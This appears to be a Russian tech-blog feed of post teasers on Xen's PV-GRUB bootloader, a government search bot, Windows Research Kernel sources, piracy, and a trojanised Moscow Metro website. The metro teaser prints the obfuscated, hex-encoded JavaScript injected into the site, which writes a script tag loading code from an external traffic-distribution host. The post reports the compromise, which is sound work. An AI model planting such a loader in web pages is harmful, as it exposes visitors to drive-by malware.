• Паравиртуализация в Xen: без загрузчика никуда

      Xen mascot PV-GRUB (не путать с заведомо костыльным pygrub) является основанным на GRUB 0.9x загрузчиком для паравиртуальных машин Xen, позволяющим загружать ядро ОС непосредственно из DomU (гостевого) окружения, что добавляет процессу запуска гостевой системы существенной независимости от хост-системы. Одним на наиболее крупных внедрений можно считать облачный хостинг Amazon EC2, также использующий гипервизор Xen и предоставляющий клиентам возможность с помощью PV-GRUB загружать любые кастомизированые ядра (Use your own kernel with Amazon EC2) для паравиртуальных систем.

      В данном вопросе всё было бы исключительно позитивно, если бы не вполне обычная для свободного ПО проблема: разработка данной ветки GRUB уже как несколько лет полностью остановлена в пользу GRUB2, а сообщество разработчиков Xen, судя по всему, в ближайшие годы основанной на актуальной версии GRUB замены PV загрузчику предоставить не готово. Сам PV-GRUB, несмотря на то, что является, в общем-то, частью официального дистрибутива Xen, в настоящее время уже исключён как минимум из соответствующих пакетов в репозиториях Debian и Ubuntu, а пользователи, привыкшие к удобствам, между тем требуют (Debian bug #588839: Include pv-grub to securely boot guest kernels) и требуют (Ubuntu bug #798583: xen-utils-4.1 does not have pvgrub)… Хотя лично для меня не очень понятна мотивация мейнтейнеров Xen пакетов, ссылающихся на некие невнятные проблемы с зависимостями, в то время как пакеты с GRUB 0.97 всё ещё доступны и работоспособны, да и к существующему функционалу претензий нет.

      Здесь я постараюсь описать, пожалуй, наиболее приемлемое в настоящий момент решение насущной проблемы — самостоятельную сборку PV-GRUB и необходимую настройку DomU для его использования, благо никаких сверхъестественных усилий для этого не требуется.
      Читать дальше →
    • Госпоиск состоялся: по Рунету начал ходить бот электронного правительства или госпоисковика

        Roem.ru обсуждает теперь уже далеко не слух:
        За последние дни в несколько раз вырос входящий трафик. Логи показывают что сайт начал посещать некий бот именующий себя «SearchBot». IP-адрес указывает на то что это некий проект электронного правительства.

        «Ведомости» около года назад писали (копия статьи в открытом доступе):
        Об идее «государственного поисковика» стало известно летом [2010 г.], когда сотрудники «Яндекса», Mail.ru и Rambler стали получать от некоей «окологосударственной» структуры предложения о переходе на работу в этот проект. Его цель, как объяснял высокопоставленный источник в Кремле, — стимулировать развитие отечественных технологий в перспективной сфере. Позднее советник президента Леонид Рейман заявил, что созданием поисковика занимаются частные компании, а Минкомсвязи лишь курирует проект. Министр же Игорь Щеголев всегда опровергал возможность господдержки для поисковой системы. Однако отсутствие финансирования национального поисковика в ФЦП еще не значит, что проект закрыт — возможно, деньги будут выделены из другого источника, предполагает руководитель одной из интернет-компаний.

        Читать дальше →
      • Исходники Windows Research Kernel в свободном доступе

          Что же такое Windows Research Kernel?


          Windows Research Kernel содержит исходные коды основной части ядра Windows (NTOS).
          NTOS реализует базовые функции операционной системы для:
          • процессов;
          • потоков;
          • виртуальной памяти и менеджеров кэшей;
          • управления вводом/выводом;
          • реестра;
          • исполнительных функций, таких как куча (heap) ядра и синхронизация;
          • менеджера объектов;
          • механизма локального вызова процедур;
          • низкоуровневого управления CPU (планирование потоков, асинхронные и отложенные вызовы процедур, обработка прерываний/ловушек, исключения).

          Читать дальше →
        • Официальный сайт Московского метрополитена затроянили

            Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку JavaScript кода:


            Смотрим последнюю строку злополучного файла:
            var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);

            После выполнения данного участка на странице происходит добавление ещё одного сценария, но уже по внешней ссылке:

            Читать дальше →
          • Пиратство как прогрессивный налог и другие мысли об эволюции распространения контента в Сети [Tim O’Reilly]

            • Перевод
            Продолжительные споры об обмене файлами побудили меня, автора и издателя, изложить некоторые суждения. Я, конечно, не занимаюсь ни фильмами, ни музыкой. Но думаю, что уроки, которые я извлек из своего опыта, приложимы и к ним.
            Читать дальше →